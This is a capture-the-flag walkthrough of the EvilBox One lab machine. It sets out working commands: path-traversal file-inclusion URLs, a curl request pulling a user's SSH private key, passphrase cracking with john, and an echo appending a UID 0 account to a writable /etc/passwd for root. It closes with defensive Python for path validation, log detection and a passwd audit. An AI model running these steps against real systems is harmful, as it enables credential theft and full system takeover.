
1. ARP host scan. My target and the eth1 interface of my Kali box are on the same LAN, so the command is:

```
arp-scan -I eth1 192.168.15.4/24
```

2. The target IP turns out to be 192.168.15.7 (192.168.15.2 is the DHCP server address of my virtual NIC, the VirtualBox Host-Only Ethernet Adapter). Scan the target for ports and services:

```
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ rustscan -a 192.168.15.7
(RustScan banner omitted)
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.15.7:22
Open 192.168.15.7:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:46 +0800
Initiating ARP Ping Scan at 16:46
Scanning 192.168.15.7 [1 port]
Completed ARP Ping Scan at 16:46, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:46
Completed Parallel DNS resolution of 1 host. at 16:46, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:46
Scanning 192.168.15.7 [2 ports]
Discovered open port 22/tcp on 192.168.15.7
Discovered open port 80/tcp on 192.168.15.7
Completed SYN Stealth Scan at 16:46, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.15.7
Host is up, received arp-response (0.0014s latency).
Scanned at 2026-03-18 16:46:20 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

3. The target has ports 22 and 80 open. Next, run a preliminary vulnerability scan of those two ports with nmap:

```
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ nmap -p 80,22 --script vuln 192.168.15.7
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 16:41 +0800
Nmap scan report for 192.168.15.7
Host is up (0.00037s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
MAC Address: 08:00:27:D4:4F:BD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 32.21 seconds
```

4. nmap found no significant vulnerability information, so look at the web service page.

5. The page source holds nothing important either, so go straight to a directory scan with gobuster:

```
gobuster dir -u http://192.168.15.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp
```

6. For now only these directories turned up; look at each of them.

7. I found that only two of these pages are of any value. The first page is just the message "Hello H4x0r", which means "hello, hacker".

8. The second page is more interesting: it is blank. So run another directory scan, this time on top of this page:

```
gobuster dir -u http://192.168.15.7/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,sh,js,asp
```

9. An evil.php file was found, but the response size is 0. Take a look.

10. I suspect evil.php needs a parameter passed to it, so brute-force the parameter name and value with ffuf:

```
ffuf -u http://192.168.15.7/secret/evil.php?FUZZ=WFUZZ -w /root/fileid.txt:FUZZ,/root/fil-payloads-scanner.txt:WFUZZ -fc 400 -fs 0
```

11. This reveals what looks like a local file inclusion vulnerability. Visit it:

```
http://192.168.15.7/secret/evil.php?command=..%2f..%2f..%2f..%2f..%2f/etc/passwd
```

12. There is a normal user named mowree. Since the earlier scan showed the system also has SSH open on port 22, use the file inclusion to look in that user's home directory: generated key pairs are usually stored under the home directory, so check whether a private key is there:

```
curl -s 'http://192.168.15.7/secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa' | sed -n '/-----BEGIN/,/-----END/p' > id_rsa_new
```

13. There really is one. Enter the following command to log in:

```
ssh -i id_rsa_new mowree@192.168.15.7
```

14. A passphrase is set on the key, so crack it:

```
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ file id_rsa_new
id_rsa_new: PEM RSA private key
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ /usr/share/john/ssh2john.py id_rsa_new > hash
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa_new)
1g 0:00:00:00 DONE (2026-03-18 17:07) 100.0g/s 124800p/s 124800c/s 124800C/s buttons..cheer1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

15. Cracking succeeded; the passphrase is unicorn. Try logging in again:

```
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ ssh -i id_rsa_new mowree@192.168.15.7
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa_new' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa_new": bad permissions
mowree@192.168.15.7's password:
Permission denied, please try again.
mowree@192.168.15.7's password:
Permission denied, please try again.
mowree@192.168.15.7's password:
```

16. The login failed. Looking more carefully afterwards, I found it was a permission problem: the private key file must have secure permissions, i.e. mode 600, otherwise SSH refuses to use it.

```
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ ls -al id_rsa_new
-rw-r--r-- 1 root root 1743 3月18日 17:04 id_rsa_new
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ chmod 600 id_rsa_new
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ ls -al id_rsa_new
-rw------- 1 root root 1743 3月18日 17:04 id_rsa_new
┌──(root@192.168.52.130 172.17.0.1:~ ]-
└─ ssh -i id_rsa_new mowree@192.168.15.7
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa_new':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
mowree@EvilBoxOne:~$
```

17. Login succeeded. Gather information:

```
mowree@EvilBoxOne:~$ pwd
/home/mowree
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) groups=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ ll
-bash: ll: command not found
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:/$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
```

The passwd binary has the SUID bit, which is perfectly normal. While at it, check the permissions of /etc/passwd as well:

```
mowree@EvilBoxOne:/tmp$ ls -l /etc/passwd
-rw-rw-rw- 1 root root 1398 Aug 16  2021 /etc/passwd
```

18. The permissions of /etc/passwd are misconfigured: ordinary users are allowed to write to it directly. I was not sure, though, that after writing a root-privileged user into /etc/passwd the system would actually authenticate against the password field in /etc/passwd, so I checked the contents of /etc/pam.d/common-auth. I found that the PAM configuration allows falling back to /etc/passwd. The key line in /etc/pam.d/common-auth is:

```
auth [success=1 default=ignore] pam_unix.so nullok_secure
```

The default behaviour of the pam_unix.so module is to check /etc/shadow first; if the user is not found there or the shadow entry is broken, it falls back to checking the password field in /etc/passwd. The nullok_secure parameter allows empty passwords, but only for logins from secure terminals; it does not force shadow-only authentication.

19. On the Kali box, generate a password hash with openssl:

```
┌──(root@192.168.52.130 172.17.0.1:/ ]-
└─ openssl passwd -1 -salt xyz 123456
$1$xyz$X11iz6ox24iPDed6detyU.
```

20. Append a line to the end of /etc/passwd, adding the GID (0) after the UID (0) and making sure the format is username:password-hash:UID:GID:description:home-directory:shell. Then run `su evil` and enter evil's password. On most modern systems, where the /etc/shadow password-shadowing mechanism is enabled, the password field (the second field) in /etc/passwd is usually just an `x` placeholder, and the actual hash is stored in /etc/shadow, which only root can read. This command tries to bypass that mechanism by writing the password hash directly into /etc/passwd. Whether it succeeds depends on the specific configuration of the system's authentication modules such as pam_unix; some older systems or special configurations still read this field. I had just verified that this system's PAM configuration allows falling back to /etc/passwd, meaning that if the user cannot be found in /etc/shadow or the shadow entry is broken, it falls back to the password field in /etc/passwd and allows authentication with that field directly. And indeed, a root shell was obtained:

```
mowree@EvilBoxOne:/tmp$ echo 'evil:$1$xyz$X11iz6ox24iPDed6detyU.:0:0:root:/root:/bin/bash' >> /etc/passwd
mowree@EvilBoxOne:/tmp$ su evil
Password:
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@EvilBoxOne:/tmp#
```

21. View the final flag:

```
root@EvilBoxOne:/tmp# cd /root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
```

22. Done.
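The file-inclusion bug behind steps 10 to 12 is a path-traversal problem: a user-supplied parameter is joined onto a directory and the encoded `..%2f` segments walk out of the web root. The following Python is an added example, not code from the EvilBox One machine or from the writeup. It shows the unsafe lookup next to a hardened one that refuses anything outside the web root, and a small detector that flags traversal attempts in web server access logs. `WEB_ROOT`, the function names and the log lines are constructed for the example; the first two log lines mirror the requests made in steps 11 and 12.

```python
"""Path traversal in a parameter like evil.php?command=..., seen from the defender's
side: the unsafe lookup, a hardened lookup that stays inside the web root, and a
detector for traversal attempts in access-log lines. Added example, not code from
the EvilBox One box or the writeup; WEB_ROOT and LOG_LINES are constructed."""
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html/secret"   # assumed document root of the vulnerable script


def naive_resolve(user_path: str) -> str:
    """What a script that joins a request parameter straight onto a directory does:
    the decoded '..' segments normalise away the base directory."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(user_path)))


def safe_resolve(user_path: str) -> str:
    """Decode once, normalise, then refuse anything that ends up outside WEB_ROOT."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    # posixpath.join drops WEB_ROOT when `decoded` is absolute, and normpath
    # collapses '..'; the prefix check catches both escape routes.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise ValueError(f"path escapes web root: {candidate}")
    return candidate


def stays_in_root(user_path: str) -> bool:
    """Boolean wrapper around safe_resolve for callers that only need a verdict."""
    try:
        safe_resolve(user_path)
        return True
    except ValueError:
        return False


# Constructed Apache-style access-log lines; the first two mirror the requests
# made in steps 11 and 12, the remaining two are benign.
LOG_LINES = [
    '192.168.15.2 - - [18/Mar/2026:16:55:01 +0800] "GET /secret/evil.php?command=..%2f..%2f..%2f..%2f..%2f/etc/passwd HTTP/1.1" 200 1398',
    '192.168.15.2 - - [18/Mar/2026:16:55:09 +0800] "GET /secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa HTTP/1.1" 200 1743',
    '192.168.15.2 - - [18/Mar/2026:16:54:30 +0800] "GET /secret/evil.php?command=index.html HTTP/1.1" 200 0',
    '192.168.15.2 - - [18/Mar/2026:16:50:12 +0800] "GET /robots.txt HTTP/1.1" 200 27',
]

REQUEST_RE = re.compile(r'^(\S+) .*"(?:GET|POST|HEAD) (\S+) HTTP/')
DOTDOT_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def traversal_attempts(lines):
    """Return (client, parameter, decoded value) for every query parameter whose
    value contains a '..' path segment after URL decoding. Decoding twice also
    surfaces double-encoded payloads such as %252e%252e%252f."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, url = m.group(1), m.group(2)
        _, _, query = unquote(unquote(url)).partition("?")
        for param in filter(None, query.split("&")):
            name, _, value = param.partition("=")
            if DOTDOT_SEGMENT.search(value.replace("\\", "/")):
                hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    print("naive:", naive_resolve("..%2f..%2f..%2f..%2f..%2f/etc/passwd"))
    print("safe :", stays_in_root("..%2f..%2f..%2f..%2f..%2f/etc/passwd"))
    for client, name, value in traversal_attempts(LOG_LINES):
        print(f"traversal attempt from {client}: {name}={value}")
```

The prefix check in `safe_resolve` is the important part: normalising alone is not enough, because `normpath` happily returns `/etc/passwd` for the traversal payload, exactly as the vulnerable script did. The detector decodes twice on purpose so that a double-encoded `..` is still seen; that is a deliberately loose rule for triage, not a replacement for the server-side check.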
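The root shell in steps 17 to 20 depends on two conditions that an integrity check on /etc/passwd catches immediately: the file being writable by non-root users, and an entry that carries a real password hash (here with UID 0) instead of the `x` shadow marker. The following Python is an added example, not code from the box or the writeup; `SAMPLE_PASSWD` and the mode bits are constructed to mirror what the writeup found, and the function names are my own. Note that pam_unix only consults /etc/shadow when the field is `x`; any other value is treated as the hash itself, which is why a writable /etc/passwd is equivalent to root.

```python
"""Audit of /etc/passwd for the two conditions the privilege escalation relied on:
a file writable by non-root users, and an entry carrying a real password hash
instead of the 'x' shadow marker. Added example, not code from the EvilBox One
box or the writeup; SAMPLE_PASSWD and the mode values are constructed."""
import os
import stat

# Field values that are not a usable hash: 'x' defers to /etc/shadow, the others
# lock the account. Anything else is used by pam_unix as the hash itself.
NON_HASH_FIELDS = {"x", "*", "!", "!!"}

# Constructed /etc/passwd content; the last line is the entry appended in step 20.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
evil:$1$xyz$X11iz6ox24iPDed6detyU.:0:0:root:/root:/bin/bash
"""


def parse_passwd(text: str):
    """Split passwd lines into dicts; malformed lines are kept with a 'malformed' key."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str, mode: int):
    """Return a list of finding strings for the given file content and st_mode."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"file is writable by group/other (mode {oct(mode & 0o777)}), expected 0644")
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry: {e['malformed']}")
            continue
        if e["pw"] == "":
            findings.append(f"line {e['line']}: {e['name']} has an empty password field")
        elif e["pw"] not in NON_HASH_FIELDS:
            findings.append(f"line {e['line']}: {e['name']} carries a password hash in "
                            "/etc/passwd; pam_unix uses it instead of /etc/shadow")
        if not e["uid"].isdigit():
            findings.append(f"line {e['line']}: {e['name']} has a non-numeric UID")
        elif int(e["uid"]) == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: {e['name']} has UID 0 (root-equivalent account)")
    return findings


def audit_file(path: str = "/etc/passwd"):
    """Run the audit against a real file; the mode comes from os.stat."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)


if __name__ == "__main__":
    # 0o100666 is the st_mode of a regular file with -rw-rw-rw-, as seen on the box.
    for finding in audit_passwd(SAMPLE_PASSWD, 0o100666):
        print(finding)
```

Run as a script it reports three findings for the constructed file: the group/other write bits, the hash in the `evil` entry, and the second UID 0 account. `audit_file()` applies the same checks to a live system; the expected clean result is an empty list with the file at mode 0644.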